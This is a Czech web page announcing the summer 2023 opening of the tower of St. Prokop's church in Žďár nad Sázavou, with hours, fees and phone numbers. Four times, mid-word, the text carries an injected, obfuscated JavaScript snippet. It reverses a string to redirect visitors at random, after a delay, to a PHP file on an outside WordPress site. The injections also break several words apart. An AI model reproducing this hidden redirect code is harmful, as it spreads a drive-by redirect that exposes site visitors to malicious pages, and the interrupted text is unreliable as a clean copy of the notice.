Rainbow page separator

Věž otevřena

1. června 2023 – 30. září 2023

věž kostela sv. Prokopa

Od 1. června do konce září denně kromě pondělí a deštivého počasí můžete vys$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toupat na ochoz věže kostela sv. Prokopa a rozhlédnout se po centru města, okolních čtvrtích, pokochat se Zelenou horou i horáckou krajinou.

Odměnou za zdolání 103 schodů vám bude krom výhledu do vzdálenosti až dvanácti kilometrů také turistické razítko, poutavé vyprávění průvodce a seznámení se se starými fo$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografiemi a zajímavostmi z his$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torie města na upraveném informačním materiálu. 

Stačí se dostavit mezi 9:00 a 11:30 nebo 13:00 a 16:30 do sídla Regionálního muzea města Žďár nad Sázavou v budově městské tvrze zhruba 100 metrů od věže, kde se vás ujme průvodce.

Pokud je již průvodce na věži, vejděte a zaplaťte přímo jemu. Vstupné činí 40 Kč a 20 Kč. 

Větší skupiny prosíme o telefonické objednání na čísle 566 688 116 nebo 731 181 839.

Na vaši návštěvu se těší římskoka$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tolická farnost kostela sv. Prokopa a Regionální muzeum města Žďáru nad Sázavou.